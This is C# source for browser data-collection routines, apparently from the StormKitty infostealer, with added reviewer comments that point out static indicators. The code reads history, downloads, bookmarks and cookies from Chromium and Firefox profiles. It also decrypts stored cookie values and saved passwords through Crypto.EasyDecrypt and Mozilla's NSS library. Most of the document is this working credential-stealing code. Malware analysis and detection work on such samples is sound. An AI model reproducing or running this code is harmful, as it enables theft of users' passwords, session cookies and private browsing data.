/// <summary>
/// Get History from chromium based browsers.
/// Reads the "urls" table through SqlReader.ReadTable and turns each row into a Site entry.
/// </summary>
/// <remarks>
/// Review note: this is a browsing-history collection routine. The observable behaviour is a
/// read of the history database and its "urls" table, presumably from outside the browser
/// process. The bare catch hides every failure, so the routine emits no error output of its own.
/// </remarks>
/// <param name="sHistory">Database location passed as the first argument to SqlReader.ReadTable.</param>
/// <returns>List with history; an empty list when the table could not be read or any exception was thrown.</returns>
public static List <Site> Get(string sHistory)
{
    try
    {
        List <Site> scHistory = new List <Site>();
        // Read data from table
        SQLite sSQLite = SqlReader.ReadTable(sHistory, "urls");
        // No table object came back: hand the caller the empty list
        if (sSQLite == null)
        {
            return(scHistory);
        }
        for (int i = 0; i < sSQLite.GetRowCount(); i++)
        {
            Site sSite = new Site();
            // Column 1 is stored as the title and column 2 as the URL, both via Crypto.GetUTF8
            sSite.sTitle = Crypto.GetUTF8(sSQLite.GetValue(i, 1));
            sSite.sUrl = Crypto.GetUTF8(sSQLite.GetValue(i, 2));
            // The stored count is the numeric value of column 3 plus one
            sSite.iCount = System.Convert.ToInt32(sSQLite.GetValue(i, 3)) + 1;
            // Analyze value: the URL is handed to Banking.ScanData (defined elsewhere)
            Banking.ScanData(sSite.sUrl);
            // Running total kept on the Counter type
            Counter.History++;
            scHistory.Add(sSite);
        }
        return(scHistory);
    }
    catch
    {
        // Any exception discards the rows gathered so far; nothing is logged
        return(new List <Site>());
    }
}
// Get cookies from gecko browser
// Resolves the cookie database with GetCookiesDBPath (defined elsewhere), reads the
// "moz_cookies" table and maps each row to a Cookie object.
// Returns the collected list, or a new empty list if an exception was thrown.
// Review note: the observable behaviour is a read of the profile's cookie database and its
// "moz_cookies" table, presumably from outside the browser process. Cookie values are
// stored exactly as the table returns them.
public static List <Cookie> Get(string path)
{
    List <Cookie> lcCookies = new List <Cookie>();
    try
    {
        string sCookiePath = GetCookiesDBPath(path);
        // Read data from table
        SQLite sSQLite = SqlReader.ReadTable(sCookiePath, "moz_cookies");
        // No table object came back: hand the caller the empty list
        if (sSQLite == null)
        {
            return(lcCookies);
        }
        for (int i = 0; i < sSQLite.GetRowCount(); i++)
        {
            Cookie cCookie = new Cookie();
            // Column mapping used here: 4 -> host, 2 -> name, 3 -> value, 5 -> path, 6 -> expiry
            cCookie.sHostKey = sSQLite.GetValue(i, 4);
            cCookie.sName = sSQLite.GetValue(i, 2);
            cCookie.sValue = sSQLite.GetValue(i, 3);
            cCookie.sPath = sSQLite.GetValue(i, 5);
            cCookie.sExpiresUtc = sSQLite.GetValue(i, 6);
            // Analyze value: the host is handed to Banking.ScanData (defined elsewhere)
            Banking.ScanData(cCookie.sHostKey);
            // Running total kept on the Counter type
            Counter.Cookies++;
            lcCookies.Add(cCookie);
        }
        return(lcCookies);
    }
    catch (Exception ex)
    {
        // The exception is only written to the console
        Console.WriteLine(ex);
    }
    // Reached only after an exception: rows gathered before the failure are not returned
    return(new List <Cookie>());
}
/// <summary>
/// Get History from chromium based browsers.
/// Reads the "urls" table through SqlReader.ReadTable and turns each row into a Site entry.
/// </summary>
/// <remarks>
/// Review note: this is a browsing-history collection routine. The observable behaviour is a
/// read of the history database and its "urls" table, presumably from outside the browser
/// process. The literal "Chromium >> Failed collect history" passed to StormKitty.Logging.Log
/// is a fixed string in the code and can serve as a static indicator.
/// </remarks>
/// <param name="sHistory">Database location passed as the first argument to SqlReader.ReadTable.</param>
/// <returns>List with history; rows gathered before an exception are still returned.</returns>
public static List <Site> Get(string sHistory)
{
    // Declared outside the try so that a partial result survives an exception
    List <Site> scHistory = new List <Site>();
    try
    {
        // Read data from table
        SQLite sSQLite = SqlReader.ReadTable(sHistory, "urls");
        // No table object came back: hand the caller the empty list
        if (sSQLite == null)
        {
            return(scHistory);
        }
        for (int i = 0; i < sSQLite.GetRowCount(); i++)
        {
            Site sSite = new Site();
            // Column 1 is stored as the title and column 2 as the URL, both via Crypto.GetUTF8
            sSite.sTitle = Crypto.GetUTF8(sSQLite.GetValue(i, 1));
            sSite.sUrl = Crypto.GetUTF8(sSQLite.GetValue(i, 2));
            // The stored count is the numeric value of column 3 plus one
            sSite.iCount = System.Convert.ToInt32(sSQLite.GetValue(i, 3)) + 1;
            // Analyze value: the URL is handed to Banking.ScanData (defined elsewhere)
            Banking.ScanData(sSite.sUrl);
            // Running total kept on the Counter type
            Counter.History++;
            scHistory.Add(sSite);
        }
    }
    catch (System.Exception ex)
    {
        // The failure is recorded through the project's own logger, exception text included
        StormKitty.Logging.Log("Chromium >> Failed collect history\n" + ex);
    }
    return(scHistory);
}
// Get history from gecko browser (the original header comment said "cookies", but the
// code reads the "moz_places" table and returns Site entries).
// Resolves the database with GetHistoryDBPath (defined elsewhere) and maps each row to a
// Site; rows whose decoded title is "0" are left out.
// Returns the collected list; rows gathered before an exception are still returned.
// Review note: the observable behaviour is a read of the profile's places database and its
// "moz_places" table, presumably from outside the browser process. The literal
// "Firefox >> history collection failed" is a fixed string usable as a static indicator.
public static List <Site> Get(string path)
{
    // Declared outside the try so that a partial result survives an exception
    List <Site> scHistory = new List <Site>();
    try
    {
        string sHistoryPath = GetHistoryDBPath(path);
        // Read data from table
        SQLite sSQLite = SqlReader.ReadTable(sHistoryPath, "moz_places");
        // No table object came back: hand the caller the empty list
        if (sSQLite == null)
        {
            return(scHistory);
        }
        for (int i = 0; i < sSQLite.GetRowCount(); i++)
        {
            Site sSite = new Site();
            // Column 2 is stored as the title and column 1 as the URL, both via Chromium.Crypto.GetUTF8
            sSite.sTitle = Chromium.Crypto.GetUTF8(sSQLite.GetValue(i, 2));
            sSite.sUrl = Chromium.Crypto.GetUTF8(sSQLite.GetValue(i, 1));
            // The stored count is the numeric value of column 4 plus one
            sSite.iCount = Convert.ToInt32(sSQLite.GetValue(i, 4)) + 1;
            // A title of "0" is treated as "no title" and the row is dropped
            if (sSite.sTitle != "0")
            {
                // Analyze value: the URL is handed to Banking.ScanData (defined elsewhere)
                Banking.ScanData(sSite.sUrl);
                // Running total kept on the Counter type
                Counter.History++;
                scHistory.Add(sSite);
            }
        }
    }
    catch (Exception ex)
    {
        // The failure is recorded through the project's own logger, exception text included
        StormKitty.Logging.Log("Firefox >> history collection failed\n" + ex);
    }
    return(scHistory);
}
/// <summary>
/// Get Downloads from chromium based browsers.
/// Reads the "downloads" table through SqlReader.ReadTable and turns each row into a Site entry.
/// </summary>
/// <remarks>
/// Review note: this is a download-history collection routine. The observable behaviour is a
/// read of the "downloads" table, presumably from outside the browser process. The bare
/// catch hides every failure, so the routine emits no error output of its own.
/// </remarks>
/// <param name="sHistory">Database location passed as the first argument to SqlReader.ReadTable.</param>
/// <returns>List with downloads; an empty list when the table could not be read or any exception was thrown.</returns>
public static List <Site> Get(string sHistory)
{
    try
    {
        List <Site> scDownloads = new List <Site>();
        // Read data from table
        SQLite sSQLite = SqlReader.ReadTable(sHistory, "downloads");
        // No table object came back: hand the caller the empty list
        if (sSQLite == null)
        {
            return(scDownloads);
        }
        for (int i = 0; i < sSQLite.GetRowCount(); i++)
        {
            Site sSite = new Site();
            // Column 2 is stored in sTitle and column 17 in sUrl, both via Crypto.GetUTF8
            sSite.sTitle = Crypto.GetUTF8(sSQLite.GetValue(i, 2));
            sSite.sUrl = Crypto.GetUTF8(sSQLite.GetValue(i, 17));
            // Analyze value: the URL is handed to Banking.ScanData (defined elsewhere)
            Banking.ScanData(sSite.sUrl);
            // Running total kept on the Counter type
            Counter.Downloads++;
            scDownloads.Add(sSite);
        }
        return(scDownloads);
    }
    catch
    {
        // Any exception discards the rows gathered so far; nothing is logged
        return(new List <Site>());
    }
}
// Get bookmarks from gecko browser
// Resolves the database with GetBookmarksDBPath (defined elsewhere), reads the
// "moz_bookmarks" table and keeps the title of every row that passes the filter below.
// Returns the collected list; rows gathered before an exception are still returned.
// Review note: the observable behaviour is a read of the "moz_bookmarks" table, presumably
// from outside the browser process. The literal "Firefox >> bookmarks collection failed"
// is a fixed string usable as a static indicator.
public static List <Bookmark> Get(string path)
{
    // Declared outside the try so that a partial result survives an exception
    List <Bookmark> scBookmark = new List <Bookmark>();
    try
    {
        // Despite its name this variable holds the bookmarks database path
        string sCookiePath = GetBookmarksDBPath(path);
        // Read data from table
        SQLite sSQLite = SqlReader.ReadTable(sCookiePath, "moz_bookmarks");
        // No table object came back: hand the caller the empty list
        if (sSQLite == null)
        {
            return(scBookmark);
        }
        for (int i = 0; i < sSQLite.GetRowCount(); i++)
        {
            Bookmark bBookmark = new Bookmark();
            // Column 5 is stored as the title; only the title is filled in
            bBookmark.sTitle = Chromium.Crypto.GetUTF8(sSQLite.GetValue(i, 5));
            // Keep the row only when column 1 decodes to "0" and the title is not "0"
            if (Chromium.Crypto.GetUTF8(sSQLite.GetValue(i, 1)).Equals("0") && bBookmark.sTitle != "0")
            {
                // Analyze value: the title is handed to Banking.ScanData (defined elsewhere)
                Banking.ScanData(bBookmark.sTitle);
                // Running total kept on the Counter type
                Counter.Bookmarks++;
                scBookmark.Add(bBookmark);
            }
        }
    }
    catch (Exception ex)
    {
        // The failure is recorded through the project's own logger, exception text included
        StormKitty.Logging.Log("Firefox >> bookmarks collection failed\n" + ex);
    }
    return(scBookmark);
}
/// <summary>
/// Get Downloads from chromium based browsers.
/// Reads the "downloads" table through SqlReader.ReadTable and turns each row into a Site entry.
/// </summary>
/// <remarks>
/// Review note: this is a download-history collection routine. The observable behaviour is a
/// read of the "downloads" table, presumably from outside the browser process. The literal
/// "Chromium >> Failed collect downloads" passed to StormKitty.Logging.Log is a fixed string
/// usable as a static indicator.
/// </remarks>
/// <param name="sHistory">Database location passed as the first argument to SqlReader.ReadTable.</param>
/// <returns>List with downloads; rows gathered before an exception are still returned.</returns>
public static List <Site> Get(string sHistory)
{
    // Declared outside the try so that a partial result survives an exception
    List <Site> scDownloads = new List <Site>();
    try
    {
        // Read data from table
        SQLite sSQLite = SqlReader.ReadTable(sHistory, "downloads");
        // No table object came back: hand the caller the empty list
        if (sSQLite == null)
        {
            return(scDownloads);
        }
        for (int i = 0; i < sSQLite.GetRowCount(); i++)
        {
            Site sSite = new Site();
            // Column 2 is stored in sTitle and column 17 in sUrl, both via Crypto.GetUTF8
            sSite.sTitle = Crypto.GetUTF8(sSQLite.GetValue(i, 2));
            sSite.sUrl = Crypto.GetUTF8(sSQLite.GetValue(i, 17));
            // Analyze value: the URL is handed to Banking.ScanData (defined elsewhere)
            Banking.ScanData(sSite.sUrl);
            // Running total kept on the Counter type
            Counter.Downloads++;
            scDownloads.Add(sSite);
        }
    }
    catch (System.Exception ex)
    {
        // The failure is recorded through the project's own logger, exception text included
        StormKitty.Logging.Log("Chromium >> Failed collect downloads\n" + ex);
    }
    return(scDownloads);
}
/// <summary>
/// Get bookmarks from chromium based browsers.
/// Reads the bookmarks file as UTF-8 text and cuts it apart with Regex.Split instead of a
/// JSON parser, keeping entries that carry a name, the type "url" and an http(s) URL.
/// </summary>
/// <remarks>
/// Review note: the observable behaviour is a plain-text read of the bookmarks file,
/// presumably from outside the browser process. The bare catch hides every failure; for
/// example a file without the "bookmark_bar" marker makes the [1] index throw and the
/// routine silently returns an empty list.
/// </remarks>
/// <param name="sBookmarks">Path of the bookmarks file; checked with File.Exists before reading.</param>
/// <returns>List with bookmarks; an empty list when the file is missing or any exception was thrown.</returns>
public static List <Bookmark> Get(string sBookmarks)
{
    try
    {
        List <Bookmark> bBookmarks = new List <Bookmark>();
        // Nothing to read: hand the caller the empty list
        if (!File.Exists(sBookmarks))
        {
            return(bBookmarks);
        }
        string data = File.ReadAllText(sBookmarks, System.Text.Encoding.UTF8); // Load file content
        // Keep only the text between the "bookmark_bar" marker and the "other" marker
        data = Regex.Split(data, " \"bookmark_bar\": {")[1];
        data = Regex.Split(data, " \"other\": {")[0];
        // Rough split into one chunk per object
        string[] payload = Regex.Split(data, "},");
        foreach (string parse in payload)
        {
            // Only chunks that look like a named URL bookmark with an http(s) address are examined
            if (parse.Contains("\"name\": \"") && parse.Contains("\"type\": \"url\",") && parse.Contains("\"url\": \"http") )
            {
                // 1-based position of the current piece within the chunk
                int index = 0;
                foreach (string target in Regex.Split(parse, Parser.separator))
                {
                    index++;
                    Bookmark bBookmark = new Bookmark();
                    // Parser.DetectTitle / Parser.Get are defined elsewhere; the URL is taken two pieces after the title
                    if (Parser.DetectTitle(target))
                    {
                        bBookmark.sTitle = Parser.Get(parse, index);
                        bBookmark.sUrl = Parser.Get(parse, index + 2);
                        // Entries without a title are skipped
                        if (string.IsNullOrEmpty(bBookmark.sTitle))
                        {
                            continue;
                        }
                        // Entries without a URL, or carrying the "Failed to parse url" marker text, are skipped
                        if (!string.IsNullOrEmpty(bBookmark.sUrl) && !bBookmark.sUrl.Contains("Failed to parse url"))
                        {
                            // Analyze value: the URL is handed to Banking.ScanData (defined elsewhere)
                            Banking.ScanData(bBookmark.sUrl);
                            // Running total kept on the Counter type
                            Counter.Bookmarks++;
                            bBookmarks.Add(bBookmark);
                        }
                    }
                }
            }
        }
        return(bBookmarks);
    }
    catch
    {
        // Any exception discards the entries gathered so far; nothing is logged
        return(new List <Bookmark>());
    }
}
// Get bookmarks from gecko browser
// Resolves the database with GetBookmarksDBPath (defined elsewhere), copies it to the
// temp directory as "places.raw", opens the copy and reads the "moz_bookmarks" table.
// Returns the collected list, or a new empty list if an exception was thrown.
// Review note: the copy at <temp>\places.raw is a file-system artifact of this routine.
// Nothing in this function deletes it afterwards, so it can remain on disk. An existing
// file of that name is deleted before the copy.
public static List <Bookmark> Get(string path)
{
    List <Bookmark> scBookmark = new List <Bookmark>();
    try
    {
        // Despite its name this variable holds the bookmarks database path
        string sCookiePath = GetBookmarksDBPath(path);
        // Nothing to read: hand the caller the empty list
        if (!File.Exists(sCookiePath))
        {
            return(scBookmark);
        }
        // Fixed file name inside the user's temp directory
        string sNewPath = Path.GetTempPath() + "\\places.raw";
        // File.Copy would throw on an existing target, so a previous copy is removed first
        if (File.Exists(sNewPath))
        {
            File.Delete(sNewPath);
        }
        File.Copy(sCookiePath, sNewPath);
        // The table is read from the copy, not from the original database
        SQLite sSQLite = new SQLite(sNewPath);
        sSQLite.ReadTable("moz_bookmarks");
        // NOTE(review): 65536 is presumably a failure sentinel of the SQLite reader - confirm against that class
        if (sSQLite.GetRowCount() == 65536)
        {
            return(new List <Bookmark>());
        }
        for (int i = 0; i < sSQLite.GetRowCount(); i++)
        {
            Bookmark bBookmark = new Bookmark();
            // Column 5 is stored as the title; only the title is filled in
            bBookmark.sTitle = Chromium.Crypto.GetUTF8(sSQLite.GetValue(i, 5));
            // Keep the row only when column 1 decodes to "0" and the title is not "0"
            if (Chromium.Crypto.GetUTF8(sSQLite.GetValue(i, 1)).Equals("0") && bBookmark.sTitle != "0")
            {
                // Analyze value: the title is handed to Banking.ScanData (defined elsewhere)
                Banking.ScanData(bBookmark.sTitle);
                // Running total kept on the Counter type
                Counter.Bookmarks++;
                scBookmark.Add(bBookmark);
            }
        }
        return(scBookmark);
    }
    catch (Exception ex)
    {
        // The exception is only written to the console
        Console.WriteLine(ex);
    }
    // Reached only after an exception: rows gathered before the failure are not returned
    return(new List <Bookmark>());
}
/// <summary>
/// Get cookies from chromium based browsers.
/// Reads the "cookies" table through SqlReader.ReadTable and maps each row to a Cookie,
/// passing column 12 through Crypto.EasyDecrypt to obtain the value.
/// </summary>
/// <remarks>
/// Review note: this is a cookie collection routine. The observable behaviour is a read of
/// the "cookies" table followed by a decryption step (Crypto.EasyDecrypt, defined elsewhere),
/// presumably from outside the browser process. The bare catch hides every failure, so the
/// routine emits no error output of its own.
/// </remarks>
/// <param name="sCookie">Database location; passed to SqlReader.ReadTable and again to Crypto.EasyDecrypt.</param>
/// <returns>List with cookies; an empty list when the table could not be read or any exception was thrown.</returns>
public static List <Cookie> Get(string sCookie)
{
    try
    {
        List <Cookie> lcCookies = new List <Cookie>();
        // Read data from table
        SQLite sSQLite = SqlReader.ReadTable(sCookie, "cookies");
        // No table object came back: hand the caller the empty list
        if (sSQLite == null)
        {
            return(lcCookies);
        }
        for (int i = 0; i < sSQLite.GetRowCount(); i++)
        {
            Cookie cCookie = new Cookie();
            // Column 12 goes through EasyDecrypt; an empty result falls back to the raw column 3
            cCookie.sValue = Crypto.EasyDecrypt(sCookie, sSQLite.GetValue(i, 12));
            if (cCookie.sValue == "")
            {
                cCookie.sValue = sSQLite.GetValue(i, 3);
            }
            // Column mapping used here: 1 -> host, 2 -> name, 4 -> path, 5 -> expiry, 6 -> secure flag
            cCookie.sHostKey = Crypto.GetUTF8(sSQLite.GetValue(i, 1));
            cCookie.sName = Crypto.GetUTF8(sSQLite.GetValue(i, 2));
            cCookie.sPath = Crypto.GetUTF8(sSQLite.GetValue(i, 4));
            cCookie.sExpiresUtc = Crypto.GetUTF8(sSQLite.GetValue(i, 5));
            // The secure flag is upper-cased before decoding
            cCookie.sIsSecure = Crypto.GetUTF8(sSQLite.GetValue(i, 6).ToUpper());
            // Analyze value: the host is handed to Banking.ScanData (defined elsewhere)
            Banking.ScanData(cCookie.sHostKey);
            // Running total kept on the Counter type
            Counter.Cookies++;
            lcCookies.Add(cCookie);
        }
        return(lcCookies);
    }
    catch
    {
        // Any exception discards the rows gathered so far; nothing is logged
        return(new List <Cookie>());
    }
}
/// <summary>
/// Get passwords from chromium based browsers.
/// Reads the "logins" table through SqlReader.ReadTable and, for every row with a non-null
/// column 5, stores the URL, the user name and the result of Crypto.EasyDecrypt.
/// </summary>
/// <remarks>
/// Review note: this is a saved-credential collection routine. The observable behaviour is a
/// read of the "logins" table followed by a decryption step (Crypto.EasyDecrypt, defined
/// elsewhere), presumably from outside the browser process. The bare catch hides every
/// failure, so the routine emits no error output of its own.
/// </remarks>
/// <param name="sLoginData">Database location; passed to SqlReader.ReadTable and again to Crypto.EasyDecrypt.</param>
/// <returns>List with passwords; an empty list when the table could not be read or any exception was thrown.</returns>
public static List <Password> Get(string sLoginData)
{
    try
    {
        List <Password> pPasswords = new List <Password>();
        // Read data from table
        SQLite sSQLite = SqlReader.ReadTable(sLoginData, "logins");
        // No table object came back: hand the caller the empty list
        if (sSQLite == null)
        {
            return(pPasswords);
        }
        for (int i = 0; i < sSQLite.GetRowCount(); i++)
        {
            Password pPassword = new Password();
            // Column 0 is stored as the URL and column 3 as the user name
            pPassword.sUrl = Crypto.GetUTF8(sSQLite.GetValue(i, 0));
            pPassword.sUsername = Crypto.GetUTF8(sSQLite.GetValue(i, 3));
            // Column 5 holds the stored password value that is handed to EasyDecrypt
            string sPassword = sSQLite.GetValue(i, 5);
            // Rows without a password value are not added to the result
            if (sPassword != null)
            {
                pPassword.sPassword = Crypto.GetUTF8(Crypto.EasyDecrypt(sLoginData, sPassword));
                pPasswords.Add(pPassword);
                // Analyze value: the URL is handed to Banking.ScanData (defined elsewhere)
                Banking.ScanData(pPassword.sUrl);
                // Running total kept on the Counter type
                Counter.Passwords++;
            }
            // Last statement of the loop body; has no effect on control flow
            continue;
        }
        return(pPasswords);
    }
    catch
    {
        // Any exception discards the rows gathered so far; nothing is logged
        return(new List <Password>());
    }
}
/// <summary>
/// Get passwords from chromium based browsers.
/// Reads the "logins" table through SqlReader.ReadTable and, for every row with a non-null
/// column 5, stores the URL, the user name and the result of Crypto.EasyDecrypt.
/// </summary>
/// <remarks>
/// Review note: this is a saved-credential collection routine. The observable behaviour is a
/// read of the "logins" table followed by a decryption step (Crypto.EasyDecrypt, defined
/// elsewhere), presumably from outside the browser process. The literal
/// "Chromium >> Failed collect passwords" passed to StormKitty.Logging.Log is a fixed string
/// usable as a static indicator.
/// </remarks>
/// <param name="sLoginData">Database location; passed to SqlReader.ReadTable and again to Crypto.EasyDecrypt.</param>
/// <returns>List with passwords; rows gathered before an exception are still returned.</returns>
public static List <Password> Get(string sLoginData)
{
    // Declared outside the try so that a partial result survives an exception
    List <Password> pPasswords = new List <Password>();
    try
    {
        // Read data from table
        SQLite sSQLite = SqlReader.ReadTable(sLoginData, "logins");
        // No table object came back: hand the caller the empty list
        if (sSQLite == null)
        {
            return(pPasswords);
        }
        for (int i = 0; i < sSQLite.GetRowCount(); i++)
        {
            Password pPassword = new Password();
            // Column 0 is stored as the URL and column 3 as the user name
            pPassword.sUrl = Crypto.GetUTF8(sSQLite.GetValue(i, 0));
            pPassword.sUsername = Crypto.GetUTF8(sSQLite.GetValue(i, 3));
            // Column 5 holds the stored password value that is handed to EasyDecrypt
            string sPassword = sSQLite.GetValue(i, 5);
            // Rows without a password value are not added to the result
            if (sPassword != null)
            {
                pPassword.sPassword = Crypto.GetUTF8(Crypto.EasyDecrypt(sLoginData, sPassword));
                pPasswords.Add(pPassword);
                // Analyze value: the URL is handed to Banking.ScanData (defined elsewhere)
                Banking.ScanData(pPassword.sUrl);
                // Running total kept on the Counter type
                Counter.Passwords++;
            }
            // Last statement of the loop body; has no effect on control flow
            continue;
        }
    }
    catch (System.Exception ex)
    {
        // The failure is recorded through the project's own logger, exception text included
        StormKitty.Logging.Log("Chromium >> Failed collect passwords\n" + ex);
    }
    return(pPasswords);
}
// Get passwords from gecko browser (the original header comment said "bookmarks", but the
// code reads logins.json and returns Password entries).
// Works on a copy of the profile made by CopyRequiredFiles (defined elsewhere), extracts
// the "logins" array from logins.json with Regex.Split, and passes the user name and
// password fields to Decryptor.DecryptPassword.
// Returns the collected list; entries gathered before an exception are still returned.
// Review note: observable behaviour includes a short-lived copy of profile files (removed
// at the end by Filemanager.RecursiveDelete), a read of logins.json from that copy, and the
// Decryptor.LoadNSS(MozillaPath) call - by its name a load of Mozilla's NSS library into
// this process; confirm against the Decryptor class. The literal
// "Firefox >> Failed collect passwords" is a fixed string usable as a static indicator.
public static List <Password> Get(string path)
{
    List <Password> pPasswords = new List <Password>();
    // Get firefox default profile directory
    string profile = GetProfile(path);
    // No profile found: hand the caller the empty list
    if (profile == null)
    {
        return(pPasswords);
    }
    // Copy required files to temp dir
    string newProfile = CopyRequiredFiles(profile);
    // The copy failed: hand the caller the empty list
    if (newProfile == null)
    {
        return(pPasswords);
    }
    try
    {
        string JSON = File.ReadAllText(Path.Combine(newProfile, "logins.json"));
        // Keep only the text between the "logins" array start and the next top-level key
        JSON = Regex.Split(JSON, ",\"logins\":\\[")[1];
        JSON = Regex.Split(JSON, ",\"potentiallyVulnerablePasswords\"")[0];
        // Rough split into one chunk per stored login
        string[] accounts = Regex.Split(JSON, "},");
        // Decryption is attempted only when both Decryptor setup calls report success
        if (Decryptor.LoadNSS(MozillaPath))
        {
            if (Decryptor.SetProfile(newProfile))
            {
                foreach (string account in accounts)
                {
                    // FFRegex patterns are defined elsewhere; all three fields must match
                    Match
                        host = FFRegex.hostname.Match(account),
                        user = FFRegex.username.Match(account),
                        pass = FFRegex.password.Match(account);
                    if (host.Success && user.Success && pass.Success)
                    {
                        // The fourth piece after splitting on quotes is used as the field value;
                        // the host name is used as-is, the other two go through DecryptPassword
                        string
                            hostname = Regex.Split(host.Value, "\"")[3],
                            username = Decryptor.DecryptPassword(Regex.Split(user.Value, "\"")[3]),
                            password = Decryptor.DecryptPassword(Regex.Split(pass.Value, "\"")[3]);
                        Password pPassword = new Password();
                        pPassword.sUrl = hostname;
                        pPassword.sUsername = username;
                        pPassword.sPassword = password;
                        // Analyze value: the host name is handed to Banking.ScanData (defined elsewhere)
                        Banking.ScanData(hostname);
                        // Running total kept on the Counter type
                        Counter.Passwords++;
                        pPasswords.Add(pPassword);
                    }
                }
            }
            // Runs whenever LoadNSS succeeded, whether or not SetProfile did
            Decryptor.UnLoadNSS();
        }
    }
    catch (Exception ex)
    {
        // The failure is recorded through the project's own logger, exception text included
        Logging.Log("Firefox >> Failed collect passwords\n" + ex);
    }
    // The copied profile is removed on both the success and the exception path
    Filemanager.RecursiveDelete(newProfile);
    return(pPasswords);
}